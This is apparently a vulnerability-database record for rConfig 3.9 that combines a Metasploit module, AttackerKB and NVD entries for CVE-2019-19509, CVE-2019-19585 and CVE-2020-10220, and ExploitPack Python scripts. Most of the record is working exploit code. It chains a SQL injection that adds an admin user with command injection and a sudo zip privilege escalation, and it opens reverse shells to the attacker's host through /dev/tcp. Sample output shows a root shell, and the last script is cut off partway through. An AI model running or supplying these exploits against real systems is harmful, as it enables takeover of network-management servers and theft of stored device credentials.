{"id": "MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE", "type": "metasploit", "bulletinFamily": "exploit", "title": "Rconfig 3.x Chained Remote Code Execution", "description": "This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `path` parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1\\. SQLi on /commands.inc.php allows us to add an administrative user. 2\\. An authenticated session is established with the newly added user 3\\. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4\\. Remove the added admin user. Tips : once you get a shell, look at the CVE-2019-19585. You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)\n", "published": "2020-03-12T10:41:12", "modified": "2020-03-13T09:42:40", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19509", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220", "https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py", "https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py"], "cvelist": ["CVE-2019-19509", "CVE-2019-19585", "CVE-2020-10220"], "lastseen": "2020-10-15T04:00:56", "viewCount": 58, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:85DDC128-1CE2-4590-954A-13425E6BA9D8", "AKB:831EDE69-A5DC-468C-807D-144BA7CDA373", "AKB:7D55EC92-6278-4C2B-AD29-C886202D1217", "AKB:9EB7CEDF-02A1-46F2-A85D-0ED65BFD9B52", "AKB:FB545FC9-A1EB-44C3-8CBC-91FD4811C31A", "AKB:9527F9CE-9A8A-4C09-9224-6EBB1C1CE080"]}, {"type": "cve", "idList": ["CVE-2019-19509", "CVE-2020-10220", "CVE-2019-19585"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156146", "PACKETSTORM:156766", "PACKETSTORM:156950", "PACKETSTORM:156688"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B08CB2D0FD65D2459D536B8624991694", "EXPLOITPACK:D4882FF7F5ED2734A7C626D4055DCEDE", "EXPLOITPACK:70190622C383FFD1E3346CCB252B46A2"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113651", "OPENVAS:1361412562310113649", "OPENVAS:1361412562310113621"]}, {"type": "exploitdb", "idList": ["EDB-ID:48223", "EDB-ID:48208"]}, {"type": "zdt", "idList": ["1337DAY-ID-34087", "1337DAY-ID-34104", "1337DAY-ID-33879"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE/"]}, {"type": "dsquare", "idList": ["E-703"]}], "modified": "2020-10-15T04:00:56", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2020-10-15T04:00:56", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\n 'Description' => '\n This module exploits multiple vulnerabilities in rConfig version 3.9\n in order to execute arbitrary commands.\n This module takes advantage of a command injection vulnerability in the\n `path` parameter of the ajax archive file functionality within the rConfig web\n interface in order to execute the payload.\n Valid credentials for a user with administrative privileges are required.\n However, this module can bypass authentication via SQLI.\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\n The steps are:\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\n 2. An authenticated session is established with the newly added user\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\n execute the payload.\n 4. Remove the added admin user.\n Tips : once you get a shell, look at the CVE-2019-19585.\n You will probably get root because rConfig install script add Apache user to\n sudoers with nopasswd ;-)\n ',\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\n ],\n 'References' =>\n [\n ['CVE', '2019-19509'], # authenticated rce\n ['CVE', '2020-10220'], # sqli auth bypass\n %w[EDB 47982],\n %w[EDB 48208],\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\n ],\n 'Platform' => %w[unix linux],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Auto', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-03-11',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\n ]\n end\n\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\n def check\n vprint_status 'STEP 0: Get rConfig version...'\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n if !res || !res.get_html_document\n fail_with(Failure::Unknown, 'Could not check rConfig version')\n end\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\n print_good('rConfig version 3.9 detected')\n return Exploit::CheckCode::Appears\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig'\n print_status('rConfig detected, but not version 3.9')\n return Exploit::CheckCode::Detected\n end\n end\n\n # CREATE AN ADMIN USER IN RCONFIG\n def create_rconfig_user(user, _password)\n vprint_status 'STEP 1 : Adding a temporary admin user...'\n fake_id = Rex::Text.rand_text_numeric(3)\n fake_pass = Rex::Text.rand_text_alpha(10)\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\n userleveladmin = 9 # Administrator\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\n sqli_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => user_sqli\n }\n )\n unless sqli_res\n print_warning('Failed to create user: Connection failed.')\n return\n end\n print_good \"New temporary user #{user} created\"\n end\n\n # AUTHENTICATE ON RCONFIG\n def login(user, pass)\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\n # get session cookie (PHPSESSID)\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n @cookie = res.get_cookies\n if @cookie.empty?\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\n return\n end\n # authenticate\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\n 'cookie' => @cookie,\n 'vars_post' => {\n pass: pass,\n user: user,\n sublogin: 1\n }\n )\n unless res\n print_warning('Failed to authenticate: Connection failed.')\n return\n end\n print_good \"Authenticated as user #{user}\"\n end\n\n def trigger_rce(cmd, _opts = {})\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\n trigger = \"`#{cmd} #`\"\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'path' => trigger,\n 'ext' => 'random'\n }\n )\n # the page hangs because of the command being executed, so we can't expect HTTP response\n # unless res\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\n # return\n # end\n # unless res.body.include? '\"success\":true'\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\n # return\n # end\n print_good 'Command sucessfully executed'\n end\n\n # DELETE A USER\n def delete_rconfig_user(user)\n vprint_status 'STEP 4 : Removing the temporary admin user...'\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\n del_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => del_sqli\n }\n )\n unless del_res\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\n return\n end\n print_status \"User #{user} removed successfully !\"\n end\n\n def cleanup\n super\n delete_rconfig_user @username if @username\n end\n\n def exploit\n check\n @username = rand_text_alphanumeric(8..12)\n @password = 'admin'\n create_res = create_rconfig_user @username, @password\n login(@username, @password)\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\n trigger_rce(payload.encoded.to_s)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"attackerkb": [{"lastseen": "2020-11-18T06:42:09", "bulletinFamily": "info", "cvelist": ["CVE-2019-19509", "CVE-2019-19585", "CVE-2020-10220", "CVE-2020-10221"], "description": "An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n\n \n**Recent assessments:** \n \n**theguly** at March 12, 2020 3:39pm UTC reported:\n\ni love these type of vulnerabilities because they chain three findings normally considered low/medium to take over a full infrastructure.\n\nwe have: \n1) a web page that doesn\u2019t check user session ( commands.inc.php doesn\u2019t have the if (!$session-&gt;logged_in) check and therefore no auth required upon access ) \n2) a trivial unescaped GET parameter used in a sql query in that page, therefore unauth sql injection \n3) plaintext storage by default, therefore profit\n\nrConfig has access to network devices, and of course credentials (both standard and privileged) are kept in her database. \nwhat makes this attack even more useful, is that by default rConfig doesn\u2019t encrypt data so this sql injection will grant an attacker the plaintext of every juicy information about network infrastructure monitored by this tool: ip, username, password, eventual privileged ones, full configuration.\n\nsince version 3.8.0 it\u2019s possible to encrypt just passwords: <http://help.rconfig.com/settings/mainsettings> \nso point 3) is partially solved. in this case, an attacker will try to read files using sql injection, if user has FILE grants, to decrypt passwords and get loot anyway.\n\nplus, the webapp uses PDO which supports stacked queries. public exploits (<https://www.exploit-db.com/exploits/48261>) abuses this to execute INSERT statement adding new administrator, giving the chance to have RCE by chaining this CVE to CVE-2019-19509 (RCE) and LPE to root with CVE-2019-19585.\n\nas a bonus, we could chain this sqli to CVE-2020-10221 to get RCE: even if strong password are enforced (classes/usersession.class.php line 338), users\u2019 passwords are hashed using md5. a bruteforce is not that easy but way easier than against passwords hashed using modern algorithm.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2020-03-07T00:00:00", "id": "AKB:FB545FC9-A1EB-44C3-8CBC-91FD4811C31A", "href": "https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220", "type": "attackerkb", "title": "CVE-2020-10220", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-18T06:45:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-19585"], "description": "An issue was discovered in rConfig 3.9.3. The install script updates the /etc/sudoers file for rconfig specific tasks. After an \u201crConfig specific Apache configuration\u201d update, apache has high privileges for some binaries. This can be exploited by an attacker to bypass local security restrictions.\n\n \n**Recent assessments:** \n \n**theguly** at March 16, 2020 4:47pm UTC reported:\n\nnot a real assessment, just a note: sudoers here is a mess, you can achieve LPE through at least other three GTFOBINS.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2019-08-08T00:00:00", "id": "AKB:831EDE69-A5DC-468C-807D-144BA7CDA373", "href": "https://attackerkb.com/topics/D4D30tvQt3/cve-2019-19585", "type": "attackerkb", "title": "CVE-2019-19585", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:06", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10549"], "description": "rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:29am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:9527F9CE-9A8A-4C09-9224-6EBB1C1CE080", "href": "https://attackerkb.com/topics/uYlQT9uX2D/cve-2020-10549", "type": "attackerkb", "title": "CVE-2020-10549", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:11", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10548"], "description": "rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:28am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:85DDC128-1CE2-4590-954A-13425E6BA9D8", "href": "https://attackerkb.com/topics/1iRTqdeMy3/cve-2020-10548", "type": "attackerkb", "title": "CVE-2020-10548", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10547"], "description": "rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:28am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:7D55EC92-6278-4C2B-AD29-C886202D1217", "href": "https://attackerkb.com/topics/FwSrucCxyn/cve-2020-10547", "type": "attackerkb", "title": "CVE-2020-10547", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10546"], "description": "rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:27am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:9EB7CEDF-02A1-46F2-A85D-0ED65BFD9B52", "href": "https://attackerkb.com/topics/alZARrW6Ty/cve-2020-10546", "type": "attackerkb", "title": "CVE-2020-10546", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T13:38:50", "description": "An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-06T20:15:00", "title": "CVE-2019-19509", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T18:15:00", "cpe": ["cpe:/a:rconfig:rconfig:3.9.3"], "id": "CVE-2019-19509", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19509", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:rconfig:rconfig:3.9.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:38:50", "description": "An issue was discovered in rConfig 3.9.3. The install script updates the /etc/sudoers file for rconfig specific tasks. After an \"rConfig specific Apache configuration\" update, apache has high privileges for some binaries. This can be exploited by an attacker to bypass local security restrictions.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-06T20:15:00", "title": "CVE-2019-19585", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19585"], "modified": "2020-03-28T17:15:00", "cpe": ["cpe:/a:rconfig:rconfig:3.9.3"], "id": "CVE-2019-19585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19585", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rconfig:rconfig:3.9.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T22:03:04", "description": "An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-07T23:15:00", "title": "CVE-2020-10220", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T22:15:00", "cpe": ["cpe:/a:rconfig:rconfig:3.9.4"], "id": "CVE-2020-10220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10220", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T20:41:01", "description": "\nrConfig 3.9.4 - searchField Unauthenticated Root Remote Code Execution", "edition": 1, "published": "2020-03-27T00:00:00", "title": "rConfig 3.9.4 - searchField Unauthenticated Root Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19585", "CVE-2019-19509"], "modified": "2020-03-27T00:00:00", "id": "EXPLOITPACK:B08CB2D0FD65D2459D536B8624991694", "href": "", "sourceData": "# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution\n# Exploit Author: vikingfr\n# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)\n# Date: 2020-03-12\n# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n# Install scripts :\n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\n# Version: tested v3.9.4\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\n#\n# Notes : If you want to reproduce in your lab environment follow those links :\n# http://help.rconfig.com/gettingstarted/installation\n# then\n# http://help.rconfig.com/gettingstarted/postinstall\n#\n# Example :\n# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334\n# rConfig - 3.9 - Unauthenticated root RCE\n# [+] Adding a temporary admin user...\n# [+] Authenticating as dywzxuvbah...\n# [+] Logged in successfully, triggering the payload...\n# [+] Check your listener !\n# [+] The reverse shell seems to be opened :-)\n# [+] Removing the temporary admin user...\n# [+] Done.\n#\n# $ nc -nvlp 3334\n# listening on [any] 3334 ...\n# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186\n# sh: no job control in this shell\n# sh-4.2# id\n# id\n# uid=0(root) gid=0(root) groups=0(root)\n# sh-4.2# \n\n#!/usr/bin/python3\nimport requests\nimport sys\nimport urllib.parse\nimport string\nimport random\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom requests.exceptions import Timeout\n\nprint (\"rConfig - 3.9 - Unauthenticated root RCE\")\n\nif len(sys.argv) != 4:\n print (\"[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort\")\n exit()\n\ntarget = sys.argv[1]\nip = sys.argv[2]\nport = sys.argv[3]\n\nvuln_page=\"/commands.inc.php\"\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\ndef generateUsername(stringLength=8):\n u= string.ascii_lowercase\n return ''.join(random.sample(u,stringLength))\n\nprint (\"[+] Adding a temporary admin user...\")\nfake_id = str(random.randint(200,900))\nfake_user = generateUsername(10)\nfake_pass_md5 = \"21232f297a57a5a743894a0e4a801fc3\" # hash of 'admin'\nfake_userid_md5 = \"6c97424dc92f14ae78f8cc13cd08308d\"\nuserleveladmin = 9 # Administrator\naddUserPayload=\"%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(\"+fake_id+\",%20'\"+fake_user+\"',%20'\"+fake_pass_md5+\"',%20'\"+fake_userid_md5+\"',%209,%20'\"+fake_user+\"@domain.com',%201346920339,%201);--\"\nencoded_request = target+vuln_page+vuln_parameters+addUserPayload\nfirstrequest = requests.session()\nexploit_req = firstrequest.get(encoded_request,verify=False)\n\nrequest = requests.session()\nlogin_info = {\n \"user\": fake_user,\n \"pass\": \"admin\",\n \"sublogin\": 1\n}\nprint (\"[+] Authenticating as \"+fake_user+\"...\")\nlogin_request = request.post(\n target+\"/lib/crud/userprocess.php\",\n login_info,\n verify=False,\n allow_redirects=True\n )\n\ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False)\n\npayload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)\nif dashboard_request.status_code == 200:\n print (\"[+] Logged in successfully, triggering the payload...\")\n encoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload))\n print (\"[+] Check your listener !\")\n try:\n exploit_req = request.get(encoded_request,timeout=10) \n except Timeout:\n print('[+] The reverse shell seems to be opened :-)')\n else:\n print('[-] The command was not executed by the target or you forgot to open a listener...')\n\nelif dashboard_request.status_code == 302:\n print (\"[-] Wrong credentials !? Maybe admin were not added...\")\n exit()\n\nprint(\"[+] Removing the temporary admin user...\")\ndelUserPayload=\"%20;DELETE%20FROM%20`users`%20WHERE%20`username`='\"+fake_user+\"';--\"\nencoded_request = target+vuln_page+vuln_parameters+delUserPayload\nlastrequest = requests.session()\nexploit_req = lastrequest.get(encoded_request,verify=False)\nprint (\"[+] Done.\")", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T20:41:01", "description": "\nrConfig 3.9.3 - Authenticated Remote Code Execution", "edition": 1, "published": "2020-01-30T00:00:00", "title": "rConfig 3.9.3 - Authenticated Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T00:00:00", "id": "EXPLOITPACK:70190622C383FFD1E3346CCB252B46A2", "href": "", "sourceData": "# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution\n# Date: 2019-11-07\n# CVE-2019-19509\n# Exploit Author: vikingfr\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\n# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh\n# Version: tested v3.9.3\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\n#\n# Notes : If you want to reproduce in your lab environment follow those links :\n# http://help.rconfig.com/gettingstarted/installation\n# then\n# http://help.rconfig.com/gettingstarted/postinstall\n#\n# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081\n# rconfig - CVE-2019-19509 - Web authenticated RCE\n# [+] Logged in successfully, triggering the payload...\n# [+] Check your listener !\n# ...\n# $ nc -nvlp 8081\n# listening on [any] 8081 ...\n# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458\n# bash: no job control in this shell\n# bash-4.2$ id\n# id\n# uid=48(apache) gid=48(apache) groups=48(apache)\n# bash-4.2$ \n\n#!/usr/bin/python3\n\nimport requests\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nprint (\"rconfig - CVE-2019-19509 - Web authenticated RCE\")\n\nif len(sys.argv) != 6:\n print (\"[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort\")\n exit()\n\ntarget = sys.argv[1]\nusername = sys.argv[2]\npassword = sys.argv[3]\nip = sys.argv[4]\nport = sys.argv[5]\npayload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, 